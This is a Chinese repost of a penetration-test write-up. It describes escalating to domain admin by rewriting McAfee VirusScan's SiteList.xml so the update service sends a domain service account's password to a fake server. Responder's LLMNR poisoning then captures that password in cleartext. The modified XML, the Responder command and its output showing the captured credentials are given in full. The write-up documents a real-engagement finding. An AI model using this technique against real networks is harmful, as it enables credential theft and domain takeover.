From:
https://www.92aq.com/2016/02/01/mcafee-sitelist-xml.html
原文:https://github.com/tfairane/HackStory/blob/master/McAfeePrivesc.md
在实习的时候进行的渗透测试,我发现一个很好的办法提升域用户权限. 我的工作机器上被安装了 McAfee Virusscan Enterprise 8.8 i,并且我只有一个低权限的账号.
Mcafee 有一个自定义功能的更新服务器,可以通过HTTP或SMB连接到这些服务器。. (C:ProgramDataMcAfeeCommon Framework) SiteList.xml 有一些有趣的信息和一些内部服务器名字 ...
<?xml version="1.0" encoding="UTF-8"?> <ns:SiteLists xmlns:ns="naSiteList" Type="Client"> <SiteList Default="1" Name="SomeGUID"> <HttpSite Type="fallback" Name="McAfeeHttp" Order="26" Enabled="1" Local="0" Server="update.nai.com:80"> <RelativePath>Products/CommonUpdater</RelativePath><UseAuth>0</UseAuth> <UserName></UserName> <Password Encrypted="1">XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX</Password> </HttpSite> <UNCSite Type="repository" Name="Paris" Order="13" Server="paris001" Enabled="1" Local="0"> <ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount> <DomainName>companydomain</DomainName> <UserName>McAfeeService</UserName> <Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password> </UNCSite> <UNCSite Type="repository" Name="Tokyo" Order="18" Server="tokyo000" Enabled="1" Local="0"> <ShareName>Repository$</ShareName><RelativePath></RelativePath><UseLoggedonUserAccount>0</UseLoggedonUserAccount> <DomainName>companydomain</DomainName> <UserName>McAfeeService</UserName> <Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password> </UNCSite> </SiteList></ns:SiteLists>
让我们看看 McAfeeService 用户有什么特权.
PS C:UsersTAirane> net user McAfeeService /domain The request will be processed at a domain controller for domain companydomain. User name McAfeeService Full Name McAfee ePO Comment Service Account for ePO Replication User's comment Country/region code 000 (System Default) Account activeYes Account expires Never Password last set 29/01/2007 16:03:12 Password expiresNever Password changeable 29/01/2007 16:03:12 Password required Yes User may change passwordYes Workstations allowedAll Logon script User profile Home directory Last logon29/01/2016 17:55:09 Logon hours allowed All Local Group Memberships *All Repository*Repository Global Group memberships*Domain Services Account*Workstations Administrator *Servers Administrator*Domain Users The command completed successfully.
不幸的是这个 AV 使用了 GUI 密码,我不能编辑这个文件. 不过呢,我在我的虚拟机里重新下载了一份 McAfee 然后覆盖了工作机器上的 SiteList.xml.
在这个时候,我知道我已经块成功了. 我把文件修改成差不多下面这样, 然后我通过Responder?来伪造返回一些HTTP请求..
<?xml version="1.0" encoding="UTF-8"?> <ns:SiteLists xmlns:ns="naSiteList" Type="Client"> <SiteList Default="1" Name="SomeGUID"> <HttpSite Type="fallback" Name="PWNED!" Order="26" Enabled="1" Local="0" Server="fuckingrandomserver:80"> <RelativePath>LICORNE</RelativePath><UseAuth>1</UseAuth> <UserName>McAfeeService</UserName> <Password Encrypted="1">YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY</Password> </HttpSite> </SiteList></ns:SiteLists>
我点击更新 McAfee 病毒库 并且开始了 Responder 程序.
root@kali:~/Tools/responder# python Responder.py -I eth0 --basic __ .----.-----.-----.-----.-----.-----.--||.-----.----. | _|-__|__ --|_|_| |_||-__| _| |__| |_____|_____| __|_____|__|__|_____||_____|__| |__| NBT-NS,LLMNR & MDNS Responder 2.3 Original work by Laurent Gaffie (lgaffie@trustwave.com) To kill this script hit CRTL-C ... [+] Poisoners: LLMNR[ON] NBT-NS [ON] DNS/MDNS [ON] [+] Servers: HTTP server[ON] HTTPS server [ON] WPAD proxy [OFF] SMB server [ON] Kerberos server[ON] SQL server [ON] FTP server [ON] IMAP server[ON] POP3 server[ON] SMTP server[ON] DNS server [ON] LDAP server[ON] [+] HTTP Options: Always serving EXE [OFF] Serving EXE[ON] Serving HTML [OFF] Upstream Proxy [OFF] [+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth[OFF] Force Basic Auth [ON] Force LM downgrade [OFF] Fingerprint hosts[OFF] [+] Generic Options: Responder NIC[eth0] Responder IP [192.168.169.140] Challenge set[1122334455667788] [+] Listening for events... [*] [LLMNR]Poisoned answer sent to 192.168.169.141 for name fuckingrandomserver [HTTP] Basic Client : 192.168.169.141 [HTTP] Basic Username : McAfeeService [HTTP] Basic Password : *cool_its_a_strong_password/*
日了狗了,我拿到他了 ! 现在我拥有域控制权限了
Mission accomplished !
欢迎大家关注安全工具箱,每天都会发布实用有趣的安全工具
https://www.92aq.com
微博:
http://weibo.com/u/5824380435/ 微信 (编辑:李大同)
【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!
|